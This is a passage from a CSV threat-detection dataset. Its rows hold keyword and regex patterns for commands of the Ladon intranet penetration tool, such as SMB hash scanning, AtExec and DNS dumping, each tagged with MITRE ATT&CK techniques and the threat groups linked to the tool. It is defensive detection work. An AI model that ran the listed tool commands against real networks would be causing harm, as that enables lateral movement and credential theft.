loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *.txt *",".{0,1000}Ladon\s.{0,1000}\.txt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *DeBase64*",".{0,1000}Ladon\s.{0,1000}DeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *FtpScan*",".{0,1000}Ladon\s.{0,1000}FtpScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *LdapScan*",".{0,1000}Ladon\s.{0,1000}LdapScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SMBGhost*",".{0,1000}Ladon\s.{0,1000}SMBGhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SmbHashScan*",".{0,1000}Ladon\s.{0,1000}SmbHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SmbScan*",".{0,1000}Ladon\s.{0,1000}SmbScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *SshScan*",".{0,1000}Ladon\s.{0,1000}SshScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *TomcatScan*",".{0,1000}Ladon\s.{0,1000}TomcatScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *VncScan*",".{0,1000}Ladon\s.{0,1000}VncScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WebScan*",".{0,1000}Ladon\s.{0,1000}WebScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WinrmScan*",".{0,1000}Ladon\s.{0,1000}WinrmScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WmiHashScan*",".{0,1000}Ladon\s.{0,1000}WmiHashScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon *WmiScan*",".{0,1000}Ladon\s.{0,1000}WmiScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ActiveAdmin*",".{0,1000}Ladon\sActiveAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ActiveGuest*",".{0,1000}Ladon\sActiveGuest.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AdiDnsDump *",".{0,1000}Ladon\sAdiDnsDump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon at c:*",".{0,1000}Ladon\sat\sc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AtExec*",".{0,1000}Ladon\sAtExec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 